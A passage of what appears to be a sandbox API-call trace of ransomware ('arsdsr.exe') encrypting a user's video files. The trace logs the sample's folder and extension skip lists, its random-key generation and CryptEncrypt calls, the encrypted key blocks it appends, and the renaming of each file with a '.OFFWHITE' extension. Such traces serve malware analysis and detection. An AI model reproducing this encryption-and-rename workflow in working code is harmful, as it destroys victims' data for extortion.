3n440vw-zqF0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\_h 3n440vw-zqf0.avi"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\_H 3n440vw-zqF0.avi.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\_h 3n440vw-zqf0.avi.offwhite")) returned 1 [0139.562] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc66a7d70, ftCreationTime.dwHighDateTime=0x1d5de08, ftLastAccessTime.dwLowDateTime=0x9172d570, ftLastAccessTime.dwHighDateTime=0x1d5e64d, ftLastWriteTime.dwLowDateTime=0x9172d570, ftLastWriteTime.dwHighDateTime=0x1d5e64d, nFileSizeHigh=0x0, nFileSizeLow=0xd825, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="_H 3n440vw-zqF0.avi", cAlternateFileName="_H3N44~1.AVI")) returned 0 [0139.562] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0139.562] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f472920, ftCreationTime.dwHighDateTime=0x1d5da70, ftLastAccessTime.dwLowDateTime=0x891114b0, ftLastAccessTime.dwHighDateTime=0x1d5e093, ftLastWriteTime.dwLowDateTime=0x891114b0, ftLastWriteTime.dwHighDateTime=0x1d5e093, nFileSizeHigh=0x0, nFileSizeLow=0x10039, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="l0LFbZm.avi", cAlternateFileName="")) returned 1 [0139.562] lstrcmpiW (lpString1="l0LFbZm.avi", lpString2=".") returned 1 [0139.562] lstrcmpiW (lpString1="l0LFbZm.avi", lpString2="..") returned 1 [0139.562] lstrcmpiW (lpString1="l0LFbZm.avi", lpString2="...") returned 1 [0139.562] lstrcmpiW (lpString1="l0LFbZm.avi", lpString2="windows") returned -1 [0139.562] lstrcmpiW (lpString1="l0LFbZm.avi", lpString2="$recycle.bin") returned 1 [0139.563] lstrcmpiW (lpString1="l0LFbZm.avi", lpString2="rsa") returned -1 [0139.563] lstrcmpiW (lpString1="l0LFbZm.avi", lpString2="ntuser.dat") returned -1 [0139.563] lstrcmpiW (lpString1="l0LFbZm.avi", lpString2="programdata") returned -1 [0139.563] lstrcmpiW (lpString1="l0LFbZm.avi", lpString2="appdata") returned 1 [0139.563] lstrcmpiW (lpString1="l0LFbZm.avi", lpString2="program files") returned -1 [0139.569] lstrcmpiW (lpString1="l0LFbZm.avi", lpString2="program files (x86)") returned -1 [0139.569] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0139.569] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="l0LFbZm.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0LFbZm.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0LFbZm.avi" [0139.569] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.569] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.576] PathFindExtensionW (pszPath="l0LFbZm.avi") returned=".avi" [0139.576] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0139.576] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0139.576] lstrcmpiW (lpString1=".avi", lpString2=".cab") returned -1 [0139.576] lstrcmpiW (lpString1=".avi", lpString2=".cmd") returned -1 [0139.576] lstrcmpiW (lpString1=".avi", lpString2=".com") returned -1 [0139.576] lstrcmpiW (lpString1=".avi", lpString2=".cpl") returned -1 [0139.576] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0139.587] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0139.587] lstrcmpiW (lpString1=".avi", lpString2=".url") returned -1 [0139.587] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0139.587] lstrcmpiW (lpString1=".avi", lpString2=".mp3") returned -1 [0139.587] lstrcmpiW (lpString1=".avi", lpString2=".pif") returned -1 [0139.588] lstrcmpiW (lpString1=".avi", lpString2=".mp4") returned -1 [0139.588] lstrcmpiW (lpString1=".avi", lpString2=".OFFWHITE") returned -1 [0139.589] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0139.589] lstrcmpiW (lpString1="l0LFbZm.avi", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0139.589] GetProcessHeap () returned 0x500000 [0139.589] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522140 [0139.590] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0LFbZm.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\l0lfbzm.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0139.590] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=65593) returned 1 [0139.590] GetProcessHeap () returned 0x500000 [0139.590] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0139.590] GetProcessHeap () returned 0x500000 [0139.590] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0139.590] GetProcessHeap () returned 0x500000 [0139.590] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0139.590] GetProcessHeap () returned 0x500000 [0139.590] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0139.591] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.591] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.591] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0139.591] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.591] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.591] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0139.591] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.591] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.591] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295e310*=0x100) returned 1 [0139.591] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.591] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.591] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295e30c*=0x100) returned 1 [0139.591] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10039, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.592] SetLastError (dwErrCode=0x0) [0139.592] WriteFile (in: hFile=0xb0, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0139.594] GetLastError () returned 0x0 [0139.594] GetLastError () returned 0x0 [0139.594] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10139, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.594] WriteFile (in: hFile=0xb0, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0139.594] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10239, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.594] WriteFile (in: hFile=0xb0, lpBuffer=0x522140*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x522140*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0139.595] GetProcessHeap () returned 0x500000 [0139.595] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10039) returned 0x55a7b8 [0139.595] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.595] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x10039, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x10039, lpOverlapped=0x0) returned 1 [0139.600] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.600] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x10039, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x10039, lpOverlapped=0x0) returned 1 [0139.600] GetProcessHeap () returned 0x500000 [0139.600] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0139.601] CloseHandle (hObject=0xb0) returned 1 [0139.602] GetProcessHeap () returned 0x500000 [0139.602] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0139.602] GetProcessHeap () returned 0x500000 [0139.602] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0139.602] GetProcessHeap () returned 0x500000 [0139.602] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0139.602] GetProcessHeap () returned 0x500000 [0139.602] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0139.602] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0LFbZm.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0LFbZm.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0LFbZm.avi" [0139.603] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0LFbZm.avi", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0LFbZm.avi.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0LFbZm.avi.OFFWHITE" [0139.603] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0LFbZm.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\l0lfbzm.avi"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0LFbZm.avi.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\l0lfbzm.avi.offwhite")) returned 1 [0139.604] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb8da7f0, ftCreationTime.dwHighDateTime=0x1d5e7ad, ftLastAccessTime.dwLowDateTime=0xe7d40560, ftLastAccessTime.dwHighDateTime=0x1d5dcde, ftLastWriteTime.dwLowDateTime=0xe7d40560, ftLastWriteTime.dwHighDateTime=0x1d5dcde, nFileSizeHigh=0x0, nFileSizeLow=0x15991, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="Mc6cTML2aESFrr.flv", cAlternateFileName="MC6CTM~1.FLV")) returned 1 [0139.604] lstrcmpiW (lpString1="Mc6cTML2aESFrr.flv", lpString2=".") returned 1 [0139.604] lstrcmpiW (lpString1="Mc6cTML2aESFrr.flv", lpString2="..") returned 1 [0139.604] lstrcmpiW (lpString1="Mc6cTML2aESFrr.flv", lpString2="...") returned 1 [0139.604] lstrcmpiW (lpString1="Mc6cTML2aESFrr.flv", lpString2="windows") returned -1 [0139.604] lstrcmpiW (lpString1="Mc6cTML2aESFrr.flv", lpString2="$recycle.bin") returned 1 [0139.604] lstrcmpiW (lpString1="Mc6cTML2aESFrr.flv", lpString2="rsa") returned -1 [0139.604] lstrcmpiW (lpString1="Mc6cTML2aESFrr.flv", lpString2="ntuser.dat") returned -1 [0139.604] lstrcmpiW (lpString1="Mc6cTML2aESFrr.flv", lpString2="programdata") returned -1 [0139.604] lstrcmpiW (lpString1="Mc6cTML2aESFrr.flv", lpString2="appdata") returned 1 [0139.604] lstrcmpiW (lpString1="Mc6cTML2aESFrr.flv", lpString2="program files") returned -1 [0139.604] lstrcmpiW (lpString1="Mc6cTML2aESFrr.flv", lpString2="program files (x86)") returned -1 [0139.604] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0139.604] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Mc6cTML2aESFrr.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Mc6cTML2aESFrr.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Mc6cTML2aESFrr.flv" [0139.604] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.604] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.604] PathFindExtensionW (pszPath="Mc6cTML2aESFrr.flv") returned=".flv" [0139.604] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".cab") returned 1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".cmd") returned 1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".com") returned 1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".cpl") returned 1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".url") returned -1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".mp3") returned -1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".pif") returned -1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".mp4") returned -1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".OFFWHITE") returned -1 [0139.605] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0139.605] lstrcmpiW (lpString1="Mc6cTML2aESFrr.flv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0139.605] GetProcessHeap () returned 0x500000 [0139.605] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522150 [0139.605] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Mc6cTML2aESFrr.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mc6ctml2aesfrr.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0139.606] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=88465) returned 1 [0139.606] GetProcessHeap () returned 0x500000 [0139.606] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0139.606] GetProcessHeap () returned 0x500000 [0139.606] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0139.606] GetProcessHeap () returned 0x500000 [0139.606] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0139.606] GetProcessHeap () returned 0x500000 [0139.606] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0139.606] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.606] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.606] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0139.606] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.606] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.606] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0139.606] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.607] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.607] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295e310*=0x100) returned 1 [0139.607] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.607] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.607] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295e30c*=0x100) returned 1 [0139.607] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15991, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.607] SetLastError (dwErrCode=0x0) [0139.607] WriteFile (in: hFile=0xb0, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0139.610] GetLastError () returned 0x0 [0139.610] GetLastError () returned 0x0 [0139.610] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15a91, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.610] WriteFile (in: hFile=0xb0, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0139.610] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15b91, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.610] WriteFile (in: hFile=0xb0, lpBuffer=0x522150*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x522150*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0139.610] GetProcessHeap () returned 0x500000 [0139.610] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15991) returned 0x55a7b8 [0139.610] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.610] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x15991, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x15991, lpOverlapped=0x0) returned 1 [0140.024] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.024] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x15991, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x15991, lpOverlapped=0x0) returned 1 [0140.025] GetProcessHeap () returned 0x500000 [0140.025] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0140.025] CloseHandle (hObject=0xb0) returned 1 [0140.029] GetProcessHeap () returned 0x500000 [0140.029] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0140.029] GetProcessHeap () returned 0x500000 [0140.029] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0140.029] GetProcessHeap () returned 0x500000 [0140.029] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0140.029] GetProcessHeap () returned 0x500000 [0140.029] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0140.029] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Mc6cTML2aESFrr.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Mc6cTML2aESFrr.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Mc6cTML2aESFrr.flv" [0140.029] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Mc6cTML2aESFrr.flv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Mc6cTML2aESFrr.flv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Mc6cTML2aESFrr.flv.OFFWHITE" [0140.029] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Mc6cTML2aESFrr.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mc6ctml2aesfrr.flv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Mc6cTML2aESFrr.flv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mc6ctml2aesfrr.flv.offwhite")) returned 1 [0140.030] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb55ec380, ftCreationTime.dwHighDateTime=0x1d5e518, ftLastAccessTime.dwLowDateTime=0x325ceeb0, ftLastAccessTime.dwHighDateTime=0x1d5e7d1, ftLastWriteTime.dwLowDateTime=0x325ceeb0, ftLastWriteTime.dwHighDateTime=0x1d5e7d1, nFileSizeHigh=0x0, nFileSizeLow=0x6cbd, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="OUMBCbqQCQxoqlxRj.avi", cAlternateFileName="OUMBCB~1.AVI")) returned 1 [0140.030] lstrcmpiW (lpString1="OUMBCbqQCQxoqlxRj.avi", lpString2=".") returned 1 [0140.030] lstrcmpiW (lpString1="OUMBCbqQCQxoqlxRj.avi", lpString2="..") returned 1 [0140.030] lstrcmpiW (lpString1="OUMBCbqQCQxoqlxRj.avi", lpString2="...") returned 1 [0140.031] lstrcmpiW (lpString1="OUMBCbqQCQxoqlxRj.avi", lpString2="windows") returned -1 [0140.031] lstrcmpiW (lpString1="OUMBCbqQCQxoqlxRj.avi", lpString2="$recycle.bin") returned 1 [0140.031] lstrcmpiW (lpString1="OUMBCbqQCQxoqlxRj.avi", lpString2="rsa") returned -1 [0140.031] lstrcmpiW (lpString1="OUMBCbqQCQxoqlxRj.avi", lpString2="ntuser.dat") returned 1 [0140.031] lstrcmpiW (lpString1="OUMBCbqQCQxoqlxRj.avi", lpString2="programdata") returned -1 [0140.031] lstrcmpiW (lpString1="OUMBCbqQCQxoqlxRj.avi", lpString2="appdata") returned 1 [0140.031] lstrcmpiW (lpString1="OUMBCbqQCQxoqlxRj.avi", lpString2="program files") returned -1 [0140.031] lstrcmpiW (lpString1="OUMBCbqQCQxoqlxRj.avi", lpString2="program files (x86)") returned -1 [0140.031] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0140.031] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="OUMBCbqQCQxoqlxRj.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OUMBCbqQCQxoqlxRj.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OUMBCbqQCQxoqlxRj.avi" [0140.031] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.031] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.031] PathFindExtensionW (pszPath="OUMBCbqQCQxoqlxRj.avi") returned=".avi" [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".cab") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".cmd") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".com") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".cpl") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".url") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".mp3") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".pif") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".mp4") returned -1 [0140.031] lstrcmpiW (lpString1=".avi", lpString2=".OFFWHITE") returned -1 [0140.032] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0140.032] lstrcmpiW (lpString1="OUMBCbqQCQxoqlxRj.avi", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0140.032] GetProcessHeap () returned 0x500000 [0140.032] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522160 [0140.032] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OUMBCbqQCQxoqlxRj.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\oumbcbqqcqxoqlxrj.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0140.032] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=27837) returned 1 [0140.032] GetProcessHeap () returned 0x500000 [0140.032] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0140.032] GetProcessHeap () returned 0x500000 [0140.032] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0140.032] GetProcessHeap () returned 0x500000 [0140.032] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0140.032] GetProcessHeap () returned 0x500000 [0140.033] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0140.033] lstrcmpiW (lpString1="arsdsr.exe", 